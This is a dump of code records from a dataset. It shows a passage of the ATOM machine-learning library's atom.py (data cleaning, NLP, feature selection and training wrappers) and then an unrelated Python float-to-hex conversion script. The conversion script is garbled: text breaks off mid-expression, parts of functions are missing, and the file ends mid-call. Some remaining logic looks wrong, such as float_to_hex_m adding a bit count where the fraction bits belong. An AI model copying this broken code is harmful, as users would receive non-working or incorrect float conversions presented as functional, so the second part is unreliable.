pipeline = []\r\n elif pipeline is True:\r\n pipeline = list(range(len(self.pipeline)))\r\n\r\n if len(pipeline) == 0 and not model:\r\n raise RuntimeError(\"The selected pipeline seems to be empty!\")\r\n\r\n steps = []\r\n for idx, transformer in enumerate(self.pipeline):\r\n if idx in pipeline:\r\n est = deepcopy(transformer) # Not clone to keep fitted\r\n # Set the new verbosity (if possible)\r\n if verbose is not None and hasattr(est, \"verbose\"):\r\n est.verbose = verbose\r\n\r\n steps.append((est.__class__.__name__.lower(), est))\r\n\r\n if model:\r\n model = getattr(self, self._get_model_name(model)[0])\r\n if model.scaler:\r\n steps.append((\"scaler\", deepcopy(model.scaler)))\r\n\r\n # Redirect stdout to avoid annoying prints\r\n with open(os.devnull, \"w\") as f, contextlib.redirect_stdout(f):\r\n steps.append((model.name, deepcopy(model.estimator)))\r\n\r\n return Pipeline(steps) # ATOM's pipeline, not sklearn\r\n\r\n # Base transformers ============================================ >>\r\n\r\n def _prepare_kwargs(self, kwargs, params=None):\r\n \"\"\"Return kwargs with atom's values if not specified.\"\"\"\r\n for attr in BaseTransformer.attrs:\r\n if (not params or attr in params) and attr not in kwargs:\r\n kwargs[attr] = getattr(self, attr)\r\n\r\n return kwargs\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def drop(self, columns: Union[int, str, slice, SEQUENCE_TYPES], **kwargs):\r\n \"\"\"Drop columns from the dataset.\r\n\r\n This approach is preferred over dropping columns from the\r\n dataset directly through the property's `@setter` since\r\n the transformation is saved to atom's pipeline.\r\n\r\n Parameters\r\n ----------\r\n columns: int, str, slice or sequence\r\n Names or indices of the columns to drop.\r\n\r\n \"\"\"\r\n check_method(self, \"drop\")\r\n columns = self._get_columns(columns)\r\n if self.target in columns:\r\n raise ValueError(\r\n \"Invalid value for the columns parameter. \"\r\n \"The target column can not be dropped.\"\r\n )\r\n\r\n kwargs = self._prepare_kwargs(kwargs, [\"verbose\", \"logger\"])\r\n transformer = DropTransformer(columns=columns, **kwargs)\r\n custom_transform(self, transformer, self.branch)\r\n\r\n self.branch.pipeline = self.pipeline.append(\r\n pd.Series([transformer], name=self._current), ignore_index=True\r\n )\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def apply(\r\n self,\r\n func: callable,\r\n column: Union[int, str],\r\n args=(),\r\n **kwargs\r\n ):\r\n \"\"\"Apply a function to the dataset.\r\n\r\n Transform one column in the dataset using a function (can\r\n be a lambda). If the provided column is present in the dataset,\r\n that same column is transformed. If it's not a column in the\r\n dataset, a new column with that name is created. The first\r\n parameter of the function is the complete dataset.\r\n\r\n This approach is preferred over changing the dataset directly\r\n through the property's `@setter` since the transformation\r\n is saved to atom's pipeline.\r\n\r\n Parameters\r\n ----------\r\n func: function\r\n Function to apply to the dataset.\r\n\r\n column: int or str\r\n Name or index of the column in the dataset to create\r\n or transform.\r\n\r\n args: tuple, optional (default=())\r\n Positional arguments passed to func after the dataset.\r\n\r\n **kwargs\r\n Additional keyword arguments passed to func.\r\n\r\n \"\"\"\r\n check_method(self, \"apply\")\r\n if not callable(func):\r\n raise TypeError(\r\n \"Invalid value for the func parameter. Argument is not callable!\"\r\n )\r\n\r\n if isinstance(column, int):\r\n column = self._get_columns(column)[0]\r\n\r\n kwargs = self._prepare_kwargs(kwargs, [\"verbose\", \"logger\"])\r\n transformer = FuncTransformer(func, column=column, args=args, **kwargs)\r\n custom_transform(self, transformer, self.branch)\r\n\r\n self.branch.pipeline = self.pipeline.append(\r\n pd.Series([transformer], name=self._current), ignore_index=True\r\n )\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def add(\r\n self,\r\n transformer: Any,\r\n columns: Optional[Union[int, str, slice, SEQUENCE_TYPES]] = None,\r\n train_only: bool = False,\r\n **fit_params,\r\n ):\r\n \"\"\"Add a transformer to the current branch.\r\n\r\n If the transformer is not fitted, it is fitted on the complete\r\n training set. Afterwards, the data set is transformed and the\r\n transformer is added to atom's pipeline. If the transformer is\r\n a sklearn Pipeline, every transformer is merged independently\r\n with atom.\r\n\r\n If the transformer has a `n_jobs` and/or `random_state` parameter\r\n that is left to its default value, it adopts atom's value.\r\n\r\n Parameters\r\n ----------\r\n transformer: estimator\r\n Transformer to add to the pipeline. Should implement a\r\n `transform` method.\r\n\r\n columns: int, str, slice, sequence or None, optional (default=None)\r\n Names or indices of the columns in the dataset to transform.\r\n If None, transform all columns.\r\n\r\n train_only: bool, optional (default=False)\r\n Whether to apply the transformer only on the training set or\r\n on the complete dataset.\r\n\r\n **fit_params\r\n Additional keyword arguments passed to the transformer's fit\r\n method.\r\n\r\n \"\"\"\r\n check_method(self, \"add\")\r\n if transformer.__class__.__name__ == \"Pipeline\":\r\n # Recursively add all transformers to the pipeline\r\n for name, est in transformer.named_steps.items():\r\n add_transformer(self, est, columns, train_only, **fit_params)\r\n\r\n else:\r\n add_transformer(self, transformer, columns, train_only, **fit_params)\r\n\r\n # Data cleaning transformers =================================== >>\r\n\r\n @composed(crash, method_to_log)\r\n def scale(self, strategy: str = \"standard\", **kwargs):\r\n \"\"\"Scale the data.\r\n\r\n Apply one of sklearn's scalers. Categorical columns are ignored.\r\n The estimator created by the class is attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"scale\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Scaler().get_params())\r\n scaler = Scaler(strategy=strategy, **kwargs)\r\n\r\n add_transformer(self, scaler, columns=columns)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n setattr(self.branch, strategy.lower(), getattr(scaler, strategy.lower()))\r\n\r\n @composed(crash, method_to_log)\r\n def gauss(self, strategy: str = \"yeo-johnson\", **kwargs):\r\n \"\"\"Transform the data to follow a Gaussian distribution.\r\n\r\n This transformation is useful for modeling issues related\r\n to heteroscedasticity (non-constant variance), or other\r\n situations where normality is desired. Missing values are\r\n disregarded in fit and maintained in transform. Categorical\r\n columns are ignored. The estimator created by the class is\r\n attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"gauss\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Gauss().get_params())\r\n gauss = Gauss(strategy=strategy, **kwargs)\r\n\r\n add_transformer(self, gauss, columns=columns)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n for attr in (\"yeojohnson\", \"boxcox\", \"quantile\"):\r\n if hasattr(gauss, attr):\r\n setattr(self.branch, attr, getattr(gauss, attr))\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def clean(\r\n self,\r\n drop_types: Optional[Union[str, SEQUENCE_TYPES]] = None,\r\n strip_categorical: bool = True,\r\n drop_max_cardinality: bool = True,\r\n drop_min_cardinality: bool = True,\r\n drop_duplicates: bool = False,\r\n drop_missing_target: bool = True,\r\n encode_target: bool = True,\r\n **kwargs,\r\n ):\r\n \"\"\"Applies standard data cleaning steps on the dataset.\r\n\r\n Use the parameters to choose which transformations to perform.\r\n The available steps are:\r\n - Drop columns with specific data types.\r\n - Strip categorical features from white spaces.\r\n - Drop categorical columns with maximal cardinality.\r\n - Drop columns with minimum cardinality.\r\n - Drop duplicate rows.\r\n - Drop rows with missing values in the target column.\r\n - Encode the target column.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"clean\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Cleaner().get_params())\r\n cleaner = Cleaner(\r\n drop_types=drop_types,\r\n strip_categorical=strip_categorical,\r\n drop_max_cardinality=drop_max_cardinality,\r\n drop_min_cardinality=drop_min_cardinality,\r\n drop_duplicates=drop_duplicates,\r\n drop_missing_target=drop_missing_target,\r\n encode_target=encode_target,\r\n **kwargs,\r\n )\r\n # Pass atom's missing values to the cleaner before transforming\r\n cleaner.missing = self.missing\r\n\r\n add_transformer(self, cleaner, columns=columns)\r\n\r\n # Assign mapping (if it changed)\r\n if cleaner.mapping:\r\n self.branch.mapping = cleaner.mapping\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def impute(\r\n self,\r\n strat_num: Union[int, float, str] = \"drop\",\r\n strat_cat: str = \"drop\",\r\n min_frac_rows: Optional[float] = None,\r\n min_frac_cols: Optional[float] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Handle missing values in the dataset.\r\n\r\n Impute or remove missing values according to the selected strategy.\r\n Also removes rows and columns with too many missing values. Use\r\n the `missing` attribute to customize what are considered \"missing\r\n values\".\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"impute\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Imputer().get_params())\r\n imputer = Imputer(\r\n strat_num=strat_num,\r\n strat_cat=strat_cat,\r\n min_frac_rows=min_frac_rows,\r\n min_frac_cols=min_frac_cols,\r\n **kwargs,\r\n )\r\n # Pass atom's missing values to the imputer before transforming\r\n imputer.missing = self.missing\r\n\r\n add_transformer(self, imputer, columns=columns)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def encode(\r\n self,\r\n strategy: str = \"LeaveOneOut\",\r\n max_onehot: Optional[int] = 10,\r\n frac_to_other: Optional[float] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Perform encoding of categorical features.\r\n\r\n The encoding type depends on the number of classes in the\r\n column:\r\n - If n_classes=2, use Ordinal-encoding.\r\n - If 2 < n_classes <= `max_onehot`, use OneHot-encoding.\r\n - If n_classes > `max_onehot`, use `strategy`-encoding.\r\n\r\n Also replaces classes with low occurrences with the value\r\n `other` in order to prevent too high cardinality. An error is\r\n raised if it encounters missing values or unknown classes when\r\n transforming.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"encode\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Encoder().get_params())\r\n encoder = Encoder(\r\n strategy=strategy,\r\n max_onehot=max_onehot,\r\n frac_to_other=frac_to_other,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, encoder, columns=columns)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def prune(\r\n self,\r\n strategy: Union[str, SEQUENCE_TYPES] = \"z-score\",\r\n method: Union[int, float, str] = \"drop\",\r\n max_sigma: Union[int, float] = 3,\r\n include_target: bool = False,\r\n **kwargs,\r\n ):\r\n \"\"\"Prune outliers from the training set.\r\n\r\n Replace or remove outliers. The definition of outlier depends\r\n on the selected strategy and can greatly differ from one\r\n another. Only outliers from the training set are pruned in\r\n order to maintain the original distribution of samples in\r\n the test set. Ignores categorical columns. The estimators\r\n created by the class are attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"prune\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Pruner().get_params())\r\n pruner = Pruner(\r\n strategy=strategy,\r\n method=method,\r\n max_sigma=max_sigma,\r\n include_target=include_target,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, pruner, columns=columns, train_only=True)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n for strat in lst(strategy):\r\n if strat.lower() != \"z-score\":\r\n setattr(self.branch, strat.lower(), getattr(pruner, strat.lower()))\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def balance(self, strategy: str = \"ADASYN\", **kwargs):\r\n \"\"\"Balance the number of rows per class in the target column.\r\n\r\n Only the training set is balanced in order to maintain the\r\n original distribution of target classes in the test set.\r\n Use only for classification tasks. The estimator created by\r\n the class is attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"balance\")\r\n if not self.goal.startswith(\"class\"):\r\n raise PermissionError(\r\n \"The balance method is only available for classification tasks!\"\r\n )\r\n\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Balancer().get_params())\r\n balancer = Balancer(strategy=strategy, **kwargs)\r\n\r\n # Add mapping from atom to balancer for cleaner printing\r\n balancer.mapping = self.mapping\r\n\r\n add_transformer(self, balancer, columns=columns, train_only=True)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n setattr(self.branch, strategy.lower(), getattr(balancer, strategy.lower()))\r\n\r\n # NLP transformers ============================================= >>\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def textclean(\r\n self,\r\n decode: bool = True,\r\n lower_case: bool = True,\r\n drop_email: bool = True,\r\n regex_email: Optional[str] = None,\r\n drop_url: bool = True,\r\n regex_url: Optional[str] = None,\r\n drop_html: bool = True,\r\n regex_html: Optional[str] = None,\r\n drop_emoji: bool = True,\r\n regex_emoji: Optional[str] = None,\r\n drop_number: bool = True,\r\n regex_number: Optional[str] = None,\r\n drop_punctuation: bool = True,\r\n **kwargs,\r\n ):\r\n \"\"\"Applies standard text cleaning to the corpus.\r\n\r\n Transformations include normalizing characters and dropping\r\n noise from the text (emails, HTML tags, URLs, etc...). The\r\n transformations are applied on the column named `Corpus`, in\r\n the same order the parameters are presented. If there is no\r\n column with that name, an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"nlpclean\")\r\n kwargs = self._prepare_kwargs(kwargs, TextCleaner().get_params())\r\n textcleaner = TextCleaner(\r\n decode=decode,\r\n lower_case=lower_case,\r\n drop_email=drop_email,\r\n regex_email=regex_email,\r\n drop_url=drop_url,\r\n regex_url=regex_url,\r\n drop_html=drop_html,\r\n regex_html=regex_html,\r\n drop_emoji=drop_emoji,\r\n regex_emoji=regex_emoji,\r\n drop_number=drop_number,\r\n regex_number=regex_number,\r\n drop_punctuation=drop_punctuation,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, textcleaner)\r\n\r\n setattr(self.branch, \"drops\", getattr(textcleaner, \"drops\"))\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def tokenize(\r\n self,\r\n bigram_freq: Optional[SCALAR] = None,\r\n trigram_freq: Optional[SCALAR] = None,\r\n quadgram_freq: Optional[SCALAR] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Tokenize the corpus.\r\n\r\n Convert documents into sequences of words. Additionally,\r\n create n-grams (represented by words united with underscores,\r\n e.g. \"New_York\") based on their frequency in the corpus. The\r\n transformations are applied on the column named `Corpus`. If\r\n there is no column with that name, an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"tokenize\")\r\n kwargs = self._prepare_kwargs(kwargs, Tokenizer().get_params())\r\n tokenizer = Tokenizer(\r\n bigram_freq=bigram_freq,\r\n trigram_freq=trigram_freq,\r\n quadgram_freq=quadgram_freq,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, tokenizer)\r\n\r\n self.branch.bigrams = tokenizer.bigrams\r\n self.branch.trigrams = tokenizer.trigrams\r\n self.branch.quadgrams = tokenizer.quadgrams\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def normalize(\r\n self,\r\n stopwords: Union[bool, str] = True,\r\n custom_stopwords: Optional[SEQUENCE_TYPES] = None,\r\n stem: Union[bool, str] = False,\r\n lemmatize: bool = True,\r\n **kwargs,\r\n ):\r\n \"\"\"Normalize the corpus.\r\n\r\n Convert words to a more uniform standard. The transformations\r\n are applied on the column named `Corpus`, in the same order the\r\n parameters are presented. If there is no column with that name,\r\n an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"normalize\")\r\n kwargs = self._prepare_kwargs(kwargs, Normalizer().get_params())\r\n normalizer = Normalizer(\r\n stopwords=stopwords,\r\n custom_stopwords=custom_stopwords,\r\n stem=stem,\r\n lemmatize=lemmatize,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, normalizer)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def vectorize(self, strategy: str = \"BOW\", **kwargs):\r\n \"\"\"Vectorize the corpus.\r\n\r\n Transform the corpus into meaningful vectors of numbers. The\r\n transformation is applied on the column named `Corpus`. If\r\n there is no column with that name, an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"normalize\")\r\n kwargs = self._prepare_kwargs(kwargs, Vectorizer().get_params())\r\n vectorizer = Vectorizer(strategy=strategy, **kwargs)\r\n\r\n add_transformer(self, vectorizer)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n for attr in (\"bow\", \"tfidf\", \"hashing\"):\r\n if hasattr(vectorizer, attr):\r\n setattr(self.branch, attr, getattr(vectorizer, attr))\r\n\r\n # Feature engineering transformers ============================= >>\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def feature_generation(\r\n self,\r\n strategy: str = \"DFS\",\r\n n_features: Optional[int] = None,\r\n generations: int = 20,\r\n population: int = 500,\r\n operators: Optional[Union[str, SEQUENCE_TYPES]] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Apply automated feature engineering.\r\n\r\n Use Deep feature Synthesis or a genetic algorithm to create\r\n new combinations of existing features to capture the non-linear\r\n relations between the original features. Attributes created by\r\n the class are attached to atom.\r\n\r\n See feature_engineering.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"feature_generation\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, FeatureGenerator().get_params())\r\n feature_generator = FeatureGenerator(\r\n strategy=strategy,\r\n n_features=n_features,\r\n generations=generations,\r\n population=population,\r\n operators=operators,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, feature_generator, columns=columns)\r\n\r\n # Attach the genetic attributes to atom's branch\r\n if strategy.lower() in (\"gfg\", \"genetic\"):\r\n self.branch.symbolic_transformer = feature_generator.symbolic_transformer\r\n self.branch.genetic_features = feature_generator.genetic_features\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def feature_selection(\r\n self,\r\n strategy: Optional[str] = None,\r\n solver: Optional[Union[str, callable]] = None,\r\n n_features: Optional[Union[int, float]] = None,\r\n max_frac_repeated: Optional[Union[int, float]] = 1.0,\r\n max_correlation: Optional[float] = 1.0,\r\n **kwargs,\r\n ):\r\n \"\"\"Apply feature selection techniques.\r\n\r\n Remove features according to the selected strategy. Ties\r\n between features with equal scores are broken in an\r\n unspecified way. Additionally, removes features with too low\r\n variance and finds pairs of collinear features based on the\r\n Pearson correlation coefficient. For each pair above the\r\n specified limit (in terms of absolute value), it removes one\r\n of the two. Plotting methods and attributes created by the\r\n class are attached to atom.\r\n\r\n See feature_engineering.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"feature_selection\")\r\n if isinstance(strategy, str):\r\n if strategy.lower() == \"univariate\" and solver is None:\r\n if self.goal.startswith(\"reg\"):\r\n solver = \"f_regression\"\r\n else:\r\n solver = \"f_classif\"\r\n elif strategy.lower() in (\"sfm\", \"rfe\", \"rfecv\", \"sfs\"):\r\n if solver is None and self.winner:\r\n solver = self.winner.estimator\r\n elif isinstance(solver, str):\r\n # In case the user already filled the task...\r\n if not solver.endswith(\"_class\") and not solver.endswith(\"_reg\"):\r\n solver += \"_reg\" if self.task.startswith(\"reg\") else \"_class\"\r\n\r\n # If the run method was called before, use the main metric\r\n if strategy.lower() in (\"rfecv\", \"sfs\"):\r\n if self._metric and \"scoring\" not in kwargs:\r\n kwargs[\"scoring\"] = self._metric[0]\r\n\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, FeatureSelector().get_params())\r\n feature_selector = FeatureSelector(\r\n strategy=strategy,\r\n solver=solver,\r\n n_features=n_features,\r\n max_frac_repeated=max_frac_repeated,\r\n max_correlation=max_correlation,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, feature_selector, columns=columns)\r\n\r\n # Attach used attributes to atom's branch\r\n for attr in (\"collinear\", \"feature_importance\", str(strategy).lower()):\r\n if getattr(feature_selector, attr, None) is not None:\r\n setattr(self.branch, attr, getattr(feature_selector, attr))\r\n\r\n # Training methods ============================================= >>\r\n\r\n def _check(self, metric, gib, needs_proba, needs_threshold):\r\n \"\"\"Check whether the provided metric is valid.\r\n\r\n Parameters\r\n ----------\r\n metric: str, sequence or callable\r\n Metric provided for the run.\r\n\r\n gib: bool or sequence\r\n Whether the metric is a score or a loss function.\r\n\r\n needs_proba: bool or sequence\r\n Whether the metric function requires probability estimates\r\n out of a classifier.\r\n\r\n needs_threshold: bool or sequence\r\n Whether the metric function takes a continuous decision\r\n certainty.\r\n\r\n Returns\r\n -------\r\n metric: str, function, scorer or sequence\r\n Metric for the run. Should be the same as previous run.\r\n\r\n \"\"\"\r\n if self._metric:\r\n # If the metric is empty, assign the existing one\r\n if metric is None:\r\n metric = self._metric\r\n else:\r\n # If there's a metric, it should be the same as previous run\r\n _metric = BaseTrainer._prepare_metric(\r\n metric=lst(metric),\r\n greater_is_better=gib,\r\n needs_proba=needs_proba,\r\n needs_threshold=needs_threshold,\r\n )\r\n\r\n if list(_metric.keys()) != list(self._metric.keys()):\r\n raise ValueError(\r\n \"Invalid value for the metric parameter! The metric \"\r\n \"should be the same as previous run. Expected \"\r\n f\"{self.metric}, got {flt([m.name for m in _metric])}.\"\r\n )\r\n\r\n return metric\r\n\r\n def _run(self, trainer):\r\n \"\"\"Run the trainer.\r\n\r\n If all models failed, catch the errors and pass them to the\r\n atom before raising the exception. If successful run, update\r\n all relevant attributes and methods.\r\n\r\n Parameters\r\n ----------\r\n trainer: class\r\n Trainer instance to run.\r\n\r\n \"\"\"\r\n try:\r\n trainer._tracking_params = self._tracking_params\r\n trainer._branches = {self._current: self.branch}\r\n trainer._current = self._current\r\n trainer.scaled = self.scaled\r\n trainer.run()\r\n finally:\r\n # Catch errors and pass them to atom's attribute\r\n for model, error in trainer.errors.items():\r\n self.errors[model] = error\r\n self._models.pop(model, None)\r\n\r\n # Update attributes\r\n self._models.update(trainer._models)\r\n self._metric = trainer._metric\r\n\r\n for model in self._models:\r\n self.errors.pop(model.name, None) # Remove model from errors (if there)\r\n model.T = self # Change the model's parent class from trainer to atom\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def run(\r\n self,\r\n models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n greater_is_better: Union[bool, SEQUENCE_TYPES] = True,\r\n needs_proba: Union[bool, SEQUENCE_TYPES] = False,\r\n needs_threshold: Union[bool, SEQUENCE_TYPES] = False,\r\n n_calls: Union[int, SEQUENCE_TYPES] = 0,\r\n n_initial_points: Union[int, SEQUENCE_TYPES] = 5,\r\n est_params: Optional[dict] = None,\r\n bo_params: Optional[dict] = None,\r\n n_bootstrap: Union[int, SEQUENCE_TYPES] = 0,\r\n **kwargs,\r\n ):\r\n \"\"\"Fit the models in a direct fashion.\r\n\r\n Fit and evaluate over the models. Contrary to SuccessiveHalving\r\n and TrainSizing, the direct approach only iterates once over the\r\n models, using the full dataset.\r\n\r\n See the basetrainer.py module for a description of the parameters.\r\n\r\n \"\"\"\r\n metric = self._check(metric, greater_is_better, needs_proba, needs_threshold)\r\n\r\n params = (\r\n models, metric, greater_is_better, needs_proba, needs_threshold,\r\n n_calls, n_initial_points, est_params, bo_params, n_bootstrap\r\n )\r\n\r\n kwargs = self._prepare_kwargs(kwargs)\r\n if self.goal.startswith(\"class\"):\r\n trainer = DirectClassifier(*params, **kwargs)\r\n else:\r\n trainer = DirectRegressor(*params, **kwargs)\r\n\r\n self._run(trainer)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def successive_halving(\r\n self,\r\n models: Union[str, callable, SEQUENCE_TYPES],\r\n metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n greater_is_better: Union[bool, SEQUENCE_TYPES] = True,\r\n needs_proba: Union[bool, SEQUENCE_TYPES] = False,\r\n needs_threshold: Union[bool, SEQUENCE_TYPES] = False,\r\n skip_runs: int = 0,\r\n n_calls: Union[int, SEQUENCE_TYPES] = 0,\r\n n_initial_points: Union[int, SEQUENCE_TYPES] = 5,\r\n est_params: Optional[dict] = None,\r\n bo_params: Optional[dict] = None,\r\n n_bootstrap: Union[int, SEQUENCE_TYPES] = 0,\r\n **kwargs,\r\n ):\r\n \"\"\"Fit the models in a successive halving fashion.\r\n\r\n The successive halving technique is a bandit-based algorithm\r\n that fits N models to 1/N of the data. The best half are\r\n selected to go to the next iteration where the process is\r\n repeated. This continues until only one model remains, which\r\n is fitted on the complete dataset. Beware that a model's\r\n performance can depend greatly on the amount of data on which\r\n it is trained. For this reason, it is recommended to only use\r\n this technique with similar models, e.g. only using tree-based\r\n models.\r\n\r\n See the basetrainer.py module for a description of the parameters.\r\n\r\n \"\"\"\r\n metric = self._check(metric, greater_is_better, needs_proba, needs_threshold)\r\n\r\n params = (\r\n models, metric, greater_is_better, needs_proba, needs_threshold,\r\n skip_runs, n_calls, n_initial_points, est_params, bo_params, n_bootstrap\r\n )\r\n\r\n kwargs = self._prepare_kwargs(kwargs)\r\n if self.goal.startswith(\"class\"):\r\n trainer = SuccessiveHalvingClassifier(*params, **kwargs)\r\n else:\r\n trainer = SuccessiveHalvingRegressor(*params, **kwargs)\r\n\r\n self._run(trainer)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def train_sizing(\r\n self,\r\n models: Union[str, callable, SEQUENCE_TYPES],\r\n metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n greater_is_better: Union[bool, SEQUENCE_TYPES] = True,\r\n needs_proba: Union[bool, SEQUENCE_TYPES] = False,\r\n needs_threshold: Union[bool, SEQUENCE_TYPES] = False,\r\n train_sizes: Union[int, SEQUENCE_TYPES] = 5,\r\n n_calls: Union[int, SEQUENCE_TYPES] = 0,\r\n n_initial_points: Union[int, SEQUENCE_TYPES] = 5,\r\n est_params: Optional[dict] = None,\r\n bo_params: Optional[dict] = None,\r\n n_bootstrap: Union[int, SEQUENCE_TYPES] = 0,\r\n **kwargs,\r\n ):\r\n \"\"\"Fit the models in a train sizing fashion.\r\n\r\n When training models, there is usually a trade-off between\r\n model performance and computation time, that is regulated by\r\n the number of samples in the training set. This method can be\r\n used to create insights in this trade-off, and help determine\r\n the optimal size of the training set. The models are fitted\r\n multiple times, ever-increasing the number of samples in the\r\n training set.\r\n\r\n See the basetrainer.py module for a description of the parameters.\r\n\r\n \"\"\"\r\n metric = self._check(metric, greater_is_better, needs_proba, needs_threshold)\r\n\r\n params = (\r\n models, metric, greater_is_better, needs_proba, needs_threshold,\r\n train_sizes, n_calls, n_initial_points, est_params, bo_params, n_bootstrap\r\n )\r\n\r\n kwargs = self._prepare_kwargs(kwargs)\r\n if self.goal.startswith(\"class\"):\r\n trainer = TrainSizingClassifier(*params, **kwargs)\r\n else:\r\n trainer = TrainSizingRegressor(*params, **kwargs)\r\n\r\n self._run(trainer)\r\n","sub_path":"atom/atom.py","file_name":"atom.py","file_ext":"py","file_size_in_byte":56618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"612085227","text":"\"\"\"\nsource:\n\nhttps://stackoverflow.com/questions/23624212/how-to-convert-a-float-into-hex\n\"\"\"\n\nimport math\nimport struct\n\n\ndef float_to_hex(f):\n return hex(struct.unpack('>= 1\n return v\n\n\ndef hex_to_float_m(h):\n sign = h & 0x80000000\n expo = (h & 0x7F800000) >> 23\n expo -= 0x7F\n frac = 0x800000 + (h & 0x7FFFFF)\n v = frac_to_float(frac, 24, expo)\n if sign:\n return -v\n return v\n\n\ndef decimal_to_bin(deci):\n b = 0\n expo = 0\n while deci:\n if deci % 2:\n b += pow(2, expo)\n expo += 1\n deci /= 2\n return b\n\n\ndef frac_to_bin(frac, num_bits):\n bits = list()\n for i in range(num_bits):\n bits.append(1 if frac * 2 >= 1 else 0)\n frac = frac * 2\n if frac > 1:\n frac -= 1\n elif abs(frac - 1) < 1e-15:\n break\n return sum(pow(2, e) if b else 0 for e, b in enumerate(reversed(bits)))\n\n\ndef float_to_hex_m(f):\n sign = 1 if f < 0 else 0\n f = abs(f)\n decimal_bits = decimal_to_bin(int(f))\n frac_bits = frac_to_bin(f - int(f), 23)\n # start with the sign bit\n v = 0x80000000 if sign else 0\n # followed by expo\n expo = int(math.log(decimal_bits, 2)) if decimal_bits else 0\n v += (127 + expo) << 23\n # at last, the frac\n if not frac_bits:\n return v\n frac_num_bits = int(math.log(frac_bits, 2)) + 1\n frac_bits = (decimal_bits << frac_num_bits) + frac_bits\n frac_num_bits = int(math.log(frac_bits, 2)) + 1\n if frac_num_bits > 24:\n frac_bits >>= (frac_num_bits - 24)\n elif frac_num_bits < 24:\n frac_bits <<= (24 - frac_num_bits)\n return v + (frac_num_bits - 0x800000)\n\n\nif __name__ == '__main__':\n print(float_to_hex(0.72))\n print('0x{:x}'.format(float_to_hex_m(0.72)))\n\n # some commonly known numbers\n print(float_to_hex(0.5))\n print('0x{:x}'.format(float_to_hex_m(0.5)))\n print(float_to_hex(-2.0))\n print('0x{:x}'.format(float_to_hex_m(-2.0)))\n\n print(frac_to_float(0b1101101, 7, 2))\n\n print(hex_to_float(0xC0DA0000))\n print(hex_to_float_m(0xC0DA0000))\n print(hex_to_float(0xC0140000))\n print(hex_to_float_m(0xC0140000))\n print(hex_to_float(0x3EA00000))\n print(hex_to_float_m(0x3EA00000))\n\n print('{:b}'.format(decimal_to_bin(200)))\n print('{:b}'.format(frac_to_bin(0.6875, 